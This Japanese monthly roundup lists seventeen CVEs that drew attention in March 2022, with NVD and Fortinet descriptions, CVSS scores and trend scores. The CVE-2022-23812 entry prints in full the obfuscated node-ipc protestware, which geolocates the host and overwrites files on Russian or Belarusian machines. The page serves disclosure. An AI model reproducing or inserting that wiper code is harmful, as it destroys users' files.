Home

2022年03月の脆弱性

誤りがあった場合はTwitterに報告をお願いします。-> Twitter《Har-sia》

今月話題になった脆弱性まとめ

CVE-2021-30955

Description from NVD

A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.

Information Acquisition Date:2022/04/01
CVSS 2.0: 7.6 HIGH CVSS 3.x: 7.0 HIGH
This vulnerability may involve a PoC.

Description from Forti

About the security content of macOS Monterey 12 1

Information Acquisition Date:2022/03/16

Affected Products

Impact

Recommended Actions

References


Highest Score:50 (2022/03/01)

脆弱性情報:Har-sia CVE-2021-30955


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-0492

Description from NVD

A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

Information Acquisition Date:2022/04/01
CVSS 2.0: 4.4 MEDIUM CVSS 3.x: 7.8 HIGH

Highest Score:71 (2022/03/07)

脆弱性情報:Har-sia CVE-2022-0492


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-0609

Description from Forti

Security Update 2022-02-14 from Google Chrome

Information Acquisition Date:2022/03/26

Affected Products

Impact

Recommended Actions

References


Highest Score:105 (2022/03/25)

脆弱性情報:Har-sia CVE-2022-0609


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-0778

Description from NVD

The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).

Information Acquisition Date:2022/04/01
CVSS 2.0: 5.0 MEDIUM CVSS 3.x: 7.5 HIGH
This vulnerability may involve a PoC.

Highest Score:127 (2022/03/16)

脆弱性情報:Har-sia CVE-2022-0778


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-0811

Description from NVD

A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed.

Information Acquisition Date:2022/04/01
CVSS 2.0: 9.0 HIGH CVSS 3.x: 8.8 HIGH

Highest Score:59 (2022/03/17)

脆弱性情報:Har-sia CVE-2022-0811


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-0847

Description from NVD

A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.

Information Acquisition Date:2022/04/01
CVSS 2.0: 7.2 HIGH CVSS 3.x: 7.8 HIGH
This vulnerability may involve a PoC.

Description from Forti

RHSA-2022:0819-Security Advisory

Information Acquisition Date:2022/03/30

Affected Products

Impact

Recommended Actions

References


Highest Score:274 (2022/03/08)

脆弱性情報:Har-sia CVE-2022-0847


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-1015


Highest Score:41 (2022/03/29)

脆弱性情報:Har-sia CVE-2022-1015


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-1016


Highest Score:37 (2022/03/29)

脆弱性情報:Har-sia CVE-2022-1016


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-1040

Description from NVD

An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.

Information Acquisition Date:2022/04/01
CVSS 2.0: 7.5 HIGH CVSS 3.x: 9.8 CRITICAL

Highest Score:57 (2022/03/29)

脆弱性情報:Har-sia CVE-2022-1040


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-1096

Description from Forti

Security Update 2022-03-25 from Google Chrome

Information Acquisition Date:2022/03/30

Affected Products

Impact

Recommended Actions

References


Highest Score:156 (2022/03/27)

脆弱性情報:Har-sia CVE-2022-1096


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-22963


Highest Score:200 (2022/03/31)

脆弱性情報:Har-sia CVE-2022-22963


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-23812

Description from NVD

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

Information Acquisition Date:2022/04/01
CVSS 2.0: 10.0 HIGH CVSS 3.x: 9.8 CRITICAL

Highest Score:56 (2022/03/18)

脆弱性情報:Har-sia CVE-2022-23812


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-25636

Description from NVD

net/netfilter/nf_dup_netdev.c in the Linux kernel 5.4 through 5.6.10 allows local users to gain privileges because of a heap out-of-bounds write. This is related to nf_tables_offload.

Information Acquisition Date:2022/04/01
CVSS 2.0: 6.9 MEDIUM CVSS 3.x: 7.8 HIGH

Highest Score:59 (2022/03/16)

脆弱性情報:Har-sia CVE-2022-25636


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-26143

Description from NVD

The TP-240 (aka tp240dvr) component in Mitel MiCollab before 9.4 SP1 FP1 and MiVoice Business Express through 8.1 allows remote attackers to obtain sensitive information and cause a denial of service (performance degradation and excessive outbound traffic). This was exploited in the wild in February and March 2022 for the TP240PhoneHome DDoS attack.

Information Acquisition Date:2022/04/01
CVSS 2.0: 9.0 HIGH CVSS 3.x: 9.8 CRITICAL

Highest Score:70 (2022/03/09)

脆弱性情報:Har-sia CVE-2022-26143


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-26485


Highest Score:61 (2022/03/07)

脆弱性情報:Har-sia CVE-2022-26485


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-26486


Highest Score:56 (2022/03/07)

脆弱性情報:Har-sia CVE-2022-26486


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


CVE-2022-27254

Description from NVD

The remote keyless system on Honda Civic 2018 vehicles sends the same RF signal for each door-open request, which allows for a replay attack, a related issue to CVE-2019-20626.

Information Acquisition Date:2022/04/01
CVSS 2.0: 0.0 None CVSS 3.x: 0.0 None
This vulnerability may involve a PoC.

Highest Score:70 (2022/03/26)

脆弱性情報:Har-sia CVE-2022-27254


管理者コメント

(自動翻訳)脆弱性まとめる際にここに自動翻訳を挿入します。次月までお待ちください。(自動翻訳ここまで)

###---###

参考URL:

上に戻る


計17件

Tweet